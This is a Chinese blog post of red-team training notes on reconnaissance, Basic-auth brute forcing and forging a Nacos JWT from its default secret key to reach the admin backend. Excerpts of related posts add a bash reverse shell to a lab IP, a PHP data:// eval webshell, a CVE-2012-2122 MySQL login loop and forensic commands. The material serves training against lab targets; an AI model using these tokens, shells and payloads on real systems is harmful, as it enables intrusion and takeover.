红队培训---day1
信息收集
这方面知识跟以前学的大差不差
google hack
| 关键字 | 功能 |
|---|---|
| site | 指定要搜索的域名 |
| intitle | 指定网页标题包含的字段 |
| filetype | 指定文件类型 |
| 找到的文件别乱点,尽量放虚拟环境 |
域名收集
收集完要测活
工具推荐–ehole
源码编译一直出现超时问题,直接下包吧
结果不一定正确,还是需要分析
企业信息收集
官网基本就别想了,可以去查看股权结构图(爱企查的话,是股权穿透图,找100%占比的资产,要不然可能不认)
邮箱可用来钓鱼
思路总结
企业
找边缘资产,然后找洞利用
云
找配置信息,然后进内网
edu
因为用户量大,可以搞弱口令或者社工方式进系统,然后后台拿权什么什么的
源码泄露
.git泄露
可以用dumpall,因为他能识别蜜罐,githack不能识别蜜罐
身份认证机制攻击
basic认证
例如明文数据是admin:admin格式,然后采用了base64编码
法一
那么就可以手动编辑字典,然后在爆破模块中添加base64编码的处理规则
具体的字典处理直接问ai(一般适用于确定了用户名的情况,一般指定admin)
法二
在规则中加前缀admin:,然后再增加编码的规则
nacos jwt认证
根据fscan的扫描结果,直接搜poc跟着复现就行了
原理大致就是利用未更改的默认key构造jwt数据
在nacos中,token.secret.key值是固定死的,位置在conf下的application.properties中:
1 | SecretKey012345678901234567890123456789012345678901234567890123456789 |
然后运用到一个构造用的网站
然后数据这么填写
iat字段的值是时间戳,用个转换的网站转换下就行了,时间就设置日期比当前推后一天就行,比如今天是2025-03-25,设置成2025-03-26,然后转换,就是1742918400
然后构造好的jwt数据就是
1 | eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImlhdCI6MTc0MjkxODQwMH0.3IC_lc9vcofVpWJPHjCbWMJJIs3mZabZBTFTqWedi0A |
在登录的时候抓个包,添加上Authorization:值就是刚刚构造的jwt数据
w3c规定:jwt token的标准写法Authorization: Bearer aaa.bbb.ccc
所以添加:
1 | Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImlhdCI6MTc0MjkxODQwMH0.3IC_lc9vcofVpWJPHjCbWMJJIs3mZabZBTFTqWedi0A |
然后发包,测试能进入,就是就是重新抓包,然后添加Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImlhdCI6MTc0MjkxODQwMH0.3IC_lc9vcofVpWJPHjCbWMJJIs3mZabZBTFTqWedi0A,再放包,然后就能进入后台了
flag:
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 lan1ocのblog!
相关推荐
2025-03-25
红队培训---day2
sql注入基础查询语句介绍mysql免密登录(前提是拿到root权限)mysql 的配置文件它位于/etc/my.cnf或是/etc/mysql/my.cnf在其中添加(比如ubuntu是/etc/mysql/my.cnf) 12[mysqld]skip-grant-tables 然后重启服务 手注首先要先判断字段数(order by到报错,比如4报错,说明只有3个字段)、然后查库名、表名、字段名information_schema数据库schemata:information_schema数据库中存放数据库信息的表tables:information_schema数据库中存放所有数据库中表的信息的表(这个表的利用一般是查TABLE_SCHEMA、TABLE_NAME)columns:information_schema数据库中记录所有数据库中所有表中的字段信息的表(这个表的利用一般是查TABLE_SCHEMA、TABLE_NAME、COLUMN_NAME) 常用查询语句获取所有的库名的查询语句为: 1select schema_name from...
2025-03-26
红队培训---day3
数据库漏洞利用mysqlcve-2012-2122使用mysql命令(随机密码)连接数据库 1mysql -uroot -pwrong -h 10.3.4.87 -P3306 连接失败写一个for循环,利用cve-2012-2122漏洞,最后可以连接进入mysql数据库中win: 1for /l %i in (1,1,1000) do mysql -uroot -pwrong -h 10.3.4.87 -P3306 linux: 1for i in `seq 1 1000`;do mysql -h 10.3.4.87 -uroot -proot -P3306;done 循环一段时间后即可成功(离谱,破到一半靶机断联了) 进一步利用(判断能否读写文件)判定mysql可读可写目录 1show variables like "%secure_file_priv%"; 12341.值为空代表任意读写2.有路径,代表特定路径可读写3.NULL为不可读写 写文件写文件不要直接写马,会被直接杀,建议先写探针,这样可以验证是否被解析 1select...
2025-04-14
蓝队培训---day1
流量分析Ethernet II:看源/目标mac地址Internet Protocol Version 4:源/目的ipTransmission Control Protocol: 看源/目的端口、flag位(判断哪些端口开放:syn+ack是开放,rst是未开放) 过滤语法和实践源ip为。。。。。1ip.src== 目的ip为。。。。1ip.dst== 源/目的地址为。。。。1ip.addr== 看端口是否开放(过滤出回应syn+ack的包)1tcp.flags == 0x0012 比如找靶机开了什么端口观察分析都是攻击通过65127端口来扫描(因为靶机都是回应65127端口)那就加上 1tcp.dstport==65127 过滤请求方式比如过滤POST 1http.request.method==POST 模糊匹配路径关键字匹配http类型中带有admin@123 1http contains "admin@123" 比如匹配请求中带有upload的 1http.request.uri contains...
2025-03-27
红队培训---day4
redis一键利用工具工具下完要去RedisModulesSDK/文件夹make一下(vpn分配的是虚拟网卡的ip) 反弹shell先本地写个shell 1bash -c "bash -i >& /dev/tcp/192.168.198.48/404 0>&1" 然后本地开一个http服务让redis下载本地shell监听,反弹shell 练习http://10.3.4.96:10011/ (爆破) http://10.3.4.96:10012 (文件包含)直接data协议写shell了 1http://10.3.4.96:10012/?demo=data://text/plain,<?=eval($_POST[1]);?> 然后post传参 11=system('tac fl4gisisish3r3.php'); http://10.3.4.96:10013/...
2025-04-15
蓝队培训---day2
入侵检测windows入侵检测排查思路按时间线找在攻击时间范围内,创建的文件 资源管理器直接资源管理器慢慢审 everything1C:\Users\DeepMountains datemodified:2024/08/15..2024/08/16 ext:exe 修改以上命令来查就行 信息收集看网络连接(排查暴露面)1netatat -ano 0.0.0.0代表全开放,排查从哪攻进来ESTABLISHED代表建立连接的,可以审查这些ip 查看主机信息1systeminfo 1msinfo32 环境变量信息1msinfo32 看到详细的系统信息,最主要的是能看到环境变量信息 1set 12cmd环境 进程信息1tasklist /v 1wmic process get * /value 12这条命令的作用是格式化输出获取的进程的所有信息 或者加个条件判断看单个进程 1wmic process where Caption="powershell.exe" get commandline...
2025-04-16
蓝队培训---day3
linux入侵排查信息收集网路连接信息1netstat -pantu 12netstat -pantul 可以用来指明方向,来找什么类型的业务 1ss -pantul 1hostname -I 12看当前靶机的ip 查看进程信息1top 1ps -ef 杀进程kill -9 pid,比如 1kill -9 11091 担心命令是否被替换上传一个busybox比如要运行ps 1busybox ps 用户排查思路uid为0的用户是恶意用户看/etc/sudoers # 这个文件指明了哪些用户有执行sudo的权限特殊文件排查,找有suid的文件,有suid的可执行程序可用于后门提权 看文件详细信息stat,比如看/etc/sudoers 1stat /etc/sudoers 排查suid置位的文件1find / -user root -perm -4000 -print 2>/dev/null 添加sudo执行权限先改大/etc/sudoers的权限 1chmod 777...
![[记录]尝试shiro有key无链利用,但失败](/img/c1/3.webp)